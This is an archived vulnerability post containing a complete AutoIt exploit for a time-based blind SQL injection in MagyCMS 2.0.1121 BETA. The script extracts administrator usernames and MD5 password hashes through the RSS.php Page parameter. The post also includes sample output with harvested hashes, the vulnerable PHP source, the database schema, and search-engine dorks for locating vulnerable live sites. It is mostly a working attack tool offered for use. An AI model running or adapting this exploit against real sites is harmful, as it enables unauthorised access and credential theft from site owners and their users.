SECURITYVULNS:DOC:28482
Sep 03, 2012 - 12:00 a.m.

Magy cms v 2.0.1121 BETA Blind Sql injection

2012-09-03 00:00:00
vulners.com

Hello Dear ЗАРАЗА,
Please see attach.
Attached file is commented and complete exploit which is written in AUTOIT.
It exploits the targeted CMS using a time-based method and obtains, by default, 5 usernames + corresponding MD5 passwords from the target site.

If anything unclear please let us know.

TIA as always.

/AkaStep

poc.au3

#Region ;**** Directives created by AutoIt3Wrapper_GUI****
#AutoIt3Wrapper_Outfile=cpl.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI****
#NoTrayIcon
#include <Array.au3>
#include <Inet.au3>
#include <String.au3>
#include <File.au3>

#cs

THIS IS A COMPLETE EXPLOIT WHICH IS WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
THIS IS A CONSOLE APPLICATION.
ITS MAIN PURPOSE IS TO EXPLOIT THE BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING A TIME-BASED METHOD and obtain usernames + MD5 passwords.
By default it'll obtain 5 usernames and corresponding MD5 PASSWORDS from the vulnerable site.
Since it uses a time-based method it is a really slow exploit. But it is a more convenient way than manual work ;)
In fact I coded it for fun because we always prefer manual work.

* ANYWAYS, save it as e.g. poc.au3 and COMPILE + ENJOY) *

#ce

#cs

============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ==================


Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected)
Vendor: http://www.emagy.com && broncoway.com


Vuln Type: Blind SQL injection
Exploitation technique: Time Based.
Exploit: Available

Credits: AkaStep & BOT_25 & CAMOUFL4G3

ShouTz to mariaoza;)
CAMOUFL4G3 says: FreeDom is Paradise :P

DORK 1:
google+ site:am Website by Broncoway

DORK 2: google+ site:am inurl: /magycms/

Admin Panel:
site.tld/magycms/Admin/
or
site.tld/magycms/Admin/Login.php

Demo: http://www.sgp.am


Example usage of exploit:
cmd.exe

> D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/

######################################################

MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit

Exploitation technique: Time Based

Author: AkaStep & BOT_25

######################################################


[+] Verifying your internet connection… Please Wait…[+]


[+] Inet Connection is OK … [+]


[+] Verifying is Target Site Vulnerable? Please wait…[+]


[+] Reply from target site: [+]


[+] - - - - * Vulnerable! * - - - - . [+]

[+] Trying to get average value for sleep(1) if condition is TRUE…[+]


[+] Please wait… [+]


[+] AVG sleep timeout FOR TRUE CONDITION IS: 1087 ms [+]


[+] AVG sleep timeout FOR FALSE CONDITION IS: 93 ms [+]


[+] Getting To Fetch Username(s) from table… Please wait… [+]

[+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt… [+]


[#] Username0 => [manager] [#]


[#] Username1 => [root] [#]


[#] Username2 => [d] [#]


[#] Username3 => [test] [#]


*     Total 4 users          *


[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]


[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait… [+]





Username: [manager] MD5 HASH: [04e8e47e68a7b58594fdcf994c5d490d]


Username: [root] MD5 HASH: [e10adc3949ba59abbe56e057f20f883e]


Username: [d] MD5 HASH: [326373da562269316790326c00a9972f]


Username: [test] MD5 HASH: [74a5d1ffce472f0206dd48c8ee44ca6c]



[+] Usernames And MD5 passwords saved to : mainlog.txt [+]


[+] Exploit Finished!. GooD Luck;) [+]

[+] Exit! [+]


Vulnerable Code Section:
========================== BEGIN ===================================

//magycms/Framework/public/RSS.php?Page=
/*
<?
// Check if data.inc.php is included
if(!isset($FRAMEWORK_PATH))
require_once(dirname(__FILE__)."/../../Admin/Inc/data.inc.php");
require_once(dirname(__FILE__)."/../Common.php");
require_once(dirname(__FILE__)."/../Links.php");
require_once(dirname(__FILE__)."/../URL.php");
require_once($CMS_ROOTPATH . 'Admin/Inc/db/adodb.inc.php');

/**
 * Returns News Category for page with passed name
 *
 * @param string $page
 * @return int ID of category
 */
function getCatByPage($page)
{
	global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
	// Get Page ID for fetching Category
	// $page arrives unescaped from $_GET['Page'] and is interpolated straight
	// into the quoted string literal: this is the injection point the advisory exploits
	$query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
	$hResult = $db->Execute($query);
	if (!$hResult->NumRows())
		return -1;
	$row = $hResult->FetchRow();
	$ID = $row[0];

	// Fetch category form DB;
	$query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
	$hResult = $db->Execute($query);
	if (!$hResult->NumRows())
		return -1;
	$row = $hResult->FetchRow();
	return $row[0];
}

//////////////////// Opening database connection ////////////////
$db = &ADONewConnection($DBType);
$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
// Switch to the specified charset
if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");

///////////////////////// Get Site ID ///////////////////////////
if (isset($_GET['site'])) {
	$SITEID = $_GET['site'];
	if (!is_numeric($SITEID))
		$SITEID = 1;
} else {
	$SITEID = 1;
}

////////////////// Get site URL from DB /////////////////////////
$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
$Root_URL = "aaa";
if ($hResult->NumRows())
{
	$row = $hResult->FetchRow();
	$Root_URL = $row[0];
}
//echo($Root_URL."<br>");

////////////////// Retrieving Language Prefixes /////////////////
$Lang_Prefix = array();
$hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID");
if($hpResult) {
	for($i = 0; $i < $hpResult->RowCount(); $i++) {
		$apResult = $hpResult->FetchRow();
		$Lang_Prefix[$apResult[0]] = $apResult[1];
	}
}

///////////////////////// Determine language ////////////////////
if (isset($_GET['lang'])) {
	$lang = $_GET['lang'];
	if (!is_numeric($lang))
		$lang = GetSiteSetting('Default_lang');
} else {
	$lang = GetSiteSetting('Default_lang');
}

///////////////////////// Determine news Page and Category //////
$cat = -1;
$page = "";
if (isset($_GET['Page'])) {
	$page = $_GET['Page'];	// taken as-is: no escaping, no validation
	$cat = getCatByPage($page);
}

//////////////////// Get Page information if such exists ////////
$title = "News";
$text = "";
if ($page != "")
{
	// the same unescaped $page is interpolated here as well
	$pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
	$hResult = $db->Execute($pQuery);
	if (!$hResult->NumRows())
		return -1;
	$row = $hResult->FetchRow();
	$ID = $row[0];

	// Fetch Title and Text form DB;
	$pQuery  = "SELECT Title, Text
				FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID
				WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID";
	$hResult = $db->Execute($pQuery);
	if ($hResult->NumRows())
	{
		$row = $hResult->FetchRow();
		$title = $row[0];
		$text = $row[1];
	}
}
// Construct link to News page
$mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang);

///////////////////////// GET NEWS //////////////////////////////
if ($cat == -1)
	$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
				  FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
				  WHERE d.language=$lang AND s.`site`=$SITEID";
else
	$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
				  FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
				  WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat";

$hResult = $db->Execute($mainQuery);
// check if there is something to echo
if (!$hResult->NumRows())
	die();

///////////////////////// Echo News in RSS //////////////////////
CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]);
for ($i = 0; $i < $hResult->NumRows(); $i++)
{
	$row = $hResult->FetchRow();
	$today = date("Y-m-d H:i:s");
	$startDate = $row[4];
	$endDate = $row[5];
	$startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate);
	$endDateIsOK   = (substr($endDate,   0, 10) == "0000-00-00" || $today <= $endDate);
	if ( $startDateIsOK && $endDateIsOK )
	{
		$link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}");
		CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]);
	}
}
CRSS::echoFooter();

?>

<?
class CRSS {
public static function echoHeader ($title, $link, $desc, $lastBD, $lang)
{
// send XML header
header('Content-Type: application/rss+xml; charset=utf-8');
// echo XML header
echo('<?xml version="1.0" encoding="utf-8"?>');
// echo RSS opening tags
echo('<rss version="2.0"><channel>\n');

		if ($title != "")	echo ("<title>$title</title>\n");
		if ($link != "")	echo ("<link>$link</link>\n");
		if ($desc != "")	echo ("<description>$desc</description>\n");
		if ($lastBD != "")	echo ("<lastBuildDate>$lastBD Mon, 12 Sep 2005 18:37:00 GMT</lastBuildDate>\n");
		if ($lang != "")	echo ("<language>$lang en-us</language>\n");
	}

	public static function echoFooter ()
	{
		// echo RSS closing tags
		echo('</channel></rss>');
	}

	public static function echoItem($title, $link, $guid, $pubDate, $desc)
	{
		// Strip undesired characters from description
		$desc = ereg_replace("&[^;]*;", "", $desc);
		$desc = strip_tags($desc);

		// Turn Published date into RFC format
		$time = strtotime($pubDate);
		$pubDate = gmdate("r", $time);

		// Echo the item
		echo ("<item>\n");
		if ($title != "")	echo ("<title>$title</title>\n");
		if ($link != "")	echo ("<link>$link</link>\n");
		if ($guid != "")	echo ("<guid>$guid</guid>\n");
		if ($pubDate != "")	echo ("<pubDate>$pubDate</pubDate>\n");
		if ($desc != "")	echo ("<description>$desc</description>\n");
		echo ("</item>\n");
	}
}

?>

*/

========================= END OF VULNERABLE CODE SECTION ===========================

mysql> show tables \g
+-------------------------+
| Tables_in_SNIP_SNIP_SNIP|
+-------------------------+
| admin_menus             |
| admin_menus_category    |
| admin_menus_permissions |
| admin_users             |
| banner_categories       |
| banners                 |
| banners_data            |
| banners_struct          |
| cms_languages           |
| cms_messages_categories |
| cms_messages_data       |
| cms_messages_struct     |
| cms_settings            |
| core_messages           |
| counter                 |
+-------------------------+
15 rows in set (0.00 sec)

mysql> explain admin_users \g
+----------+------------------+------+-----+---------+----------------+
| Field    | Type             | Null | Key | Default | Extra          |
+----------+------------------+------+-----+---------+----------------+
| ID       | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| Username | varchar(100)     | YES  |     | 0       |                |
| Password | varchar(100)     | YES  |     | 0       |                |
| GUID     | varchar(32)      | YES  |     | 0       |                |
| Level    | int(10) unsigned | YES  | MUL | 0       |                |
| Name     | varchar(100)     | YES  |     | 0       |                |
| Email    | varchar(45)      | YES  |     | 0       |                |
| MID      | int(10) unsigned | YES  |     | 0       |                |
+----------+------------------+------+-----+---------+----------------+
8 rows in set (0.00 sec)


A R E Y O U R E A D Y?
LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!


#ce

Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd

;// COMMAND LINE //
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld')
Exit
EndIf
$host=$CmdLine[1]

if $host='' Then
ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
Exit
EndIf

ConsoleWrite(@CRLF)
$hellomsg= _StringRepeat('#',54) & @CRLF
$allmsg=$hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
'# Exploitation technique: Time Based #' & @CRLF & _
'# Author: AkaStep & BOT_25 #' & @CRLF & _
$hellomsg;

ConsoleWrite($allmsg);

$useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1';

#cs
First checking is here any internet connection?
#ce

$separator=@CRLF & _StringRepeat('-',40) & @CRLF;
ConsoleWrite($separator & '[+] Verifying your internet connection… Please Wait…[+] ' & $separator)
Sleep(1500)
$hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD)

HttpSetUserAgent($useragent)
$is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True);
if @error Then
ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+] Can't continue…Exit. [+] " & $separator);
Exit
EndIf

ConsoleWrite($separator & '[+] Inet Connection is OK … [+] ' & $separator)
$target=$host & "/magycms/Framework/public/RSS.php?Page="
;// Vulnerable versions of MagyCMS always die here and expose the following PHP error to the public.
$isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P

$possiblevals='';//initializing of variable…

$forusernames='';// initializing it too…
for $i=28 to 61
$forusernames&=Chr(Asc("A")+$i) & @CRLF

Next

for $i=0 To 9

$possiblevals&=$i & @CRLF
; nums from 0 1 2 3 4 5 6 7 8 up to 9

Next
; then alphas from  a  b  c  d  e  up to f

$forusernames&=$possiblevals;

$possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF

$array=StringSplit($possiblevals,@CRLF,3)

$bruteusernames=StringSplit($forusernames,@CRLF,3);

$i='';//reset.

ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait…[+]' & $separator);
$maybe=_INetGetSource($target & "'",TRUE) ;//verifying…Is target site vulnerable?
if StringInStr($maybe,$isvulnerable,0) Then
$true='vulnerable'; // GPC=OFF
ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _
'[+] Trying to get average value for sleep(1) if condition is TRUE…[+]' & @CRLF & $separator & '[+] Please wait… [+] ' & $separator & @CRLF);

$additionalchecking_needed='false';

;// Will check 3 times (with TRUE condition) to get optimal avg value.

;//////////////////// Response time when condition is TRUE //////////////

local $docalc;
for $i=1 to 3

$checkfirsttime=TimerInit();

HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='8',sleep(1),0))-- AnD 9='9",True);

$rtime=TimerDiff($checkfirsttime);

$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$docalcavg=Int($docalc/3);//avg value for sleep(1).
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator);

;////////////// EOF TRUE CONDITION CHECKING ///////////////////////////

;////////////////////// WITH FALSE CONDITION ///////////////////////////

for $i=1 to 3

$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))-- AnD 9='9",True);

$rtime=TimerDiff($checkfirsttime);

$docalc+=$rtime;

Next

$checkfirsttime='';
$rtime='';
$i='';

$avgfalsecondition=Int($docalc/3);
$docalc='';

ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator);

;//////////////// END OF FALSE CONDITION ///////////////////////////////

getusername();// Fetch usernames Baby)//

Else
$true='not vulnerable'; //GPC =ON ?
ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
;// Lazy to verify it using another technique.

Exit

EndIf

Func getusername()
;//Brain f****cking
Local $oldoffset=0
$USERNAMES='';

ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table… Please wait… [+] ' & $separator)
$usernamen='';
$tyi=0;
$x=0;
$stopat=0;

do
$tyi+=1
$stopat+=1

if $tyi=21 Then
	$tyi=1;

	$x+=1
	$USERNAMES&=$usernamen & @CRLF

$usernamen='';//reset
EndIf

$limitval= ' limit 1 offset ' & $x

if $x<6 and $stopat<=5160 Then

for $q=1 To UBound($bruteusernames) - 2

$fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] & "',sleep(1),0) from admin_users" &$limitval & ")-- AnD 4='4" & @CRLF

$timer=TimerInit();

HttpSetUserAgent($useragent);
$inethandle=_INetGetSource($fetch_username,True)

$diftime=TimerDiff($timer);

if ($diftime/$docalcavg)>=0.8 Then

$usernamen&=$bruteusernames[$q]

ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Response Time: ' & $diftime & ' ms. Logging to axa.txt... [+]' & @CRLF);

FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Response Time: ' & $diftime & ' ms ' & @CRLF & $separator)

EndIf
$timer='';
$inethandle='';
$diftime='';

Next

;//
EndIf

until $x=6

$USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3);

; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY);

$y='';
for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1
if Not $USERNAMES_IN_ARRAY[$i]='' Then
$y+=1;
ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & '] [#]' & $separator)

EndIf

Next
$i='';

ConsoleWrite($separator & '* Total ' & $y & ' users *' & $separator)
$y='';

ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)

ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait… [+]' & $separator)

;// debug ok! Exit //

MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.//

EndFunc;=> getusername();

;//Below:Get passwords Function.

Func MD5EDPASSWORD()
Local $stopat;
Local $md5hash;
$MD5HASHSTRINGS='';

if $true='vulnerable' Then

for $rt=0 To 6

if not $md5hash='' Then
$MD5HASHSTRINGS&=$md5hash & @CRLF

EndIf

$md5hash='';// we need reset obtained hash here if offset incremented.
$stopat+=1;

if $rt<6 And $stopat<=3072 Then
for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it.

for $i=0 to UBound($array) - 2

$dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")-- AND 5='5"

$doittime=TimerInit();
HttpSetUserAgent($useragent);
$trigger2=_INetGetSource($target & $dynamicpayload,TRUE)

$responcetime=TimerDiff($doittime);

if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it!

$md5hash&=$array[$i]
$howmuchneeded=32-StringLen($md5hash);
if $howmuchneeded='0' then
$howmuchneeded=' NONE '
EndIf
$tolog=$separator & '[+] TRUE AT OFFSET [' & $rt & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Response Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF & 'Logging to axa.txt... ' & $separator
ConsoleWrite($tolog);
FileWrite('axa.txt',$tolog);
$tolog='';
EndIf

Next

Next
EndIf
Next

;// DISPLAYING PLUS SAVING TO MAINLOG.TXT
$MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3);

for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2

if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then

$dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] & ']' & $separator
EndIf

Next

ConsoleWrite($separator & $dd & $separator)

FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : mainlog.txt [+]' & $separator)

for $i=0 to 2
Sleep(1000);
Beep(200,300);

Next

ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)

ConsoleWrite('[+] Exit! [+]');
Exit;
EndIf
EndFunc;=> MD5EDPASSWORD();

#cs

That's All!

********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:

packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
Especially to my bro CAMOUFL4G3.

Thanks + Respect to all friends!

/AkaStep & BOT_25

#ce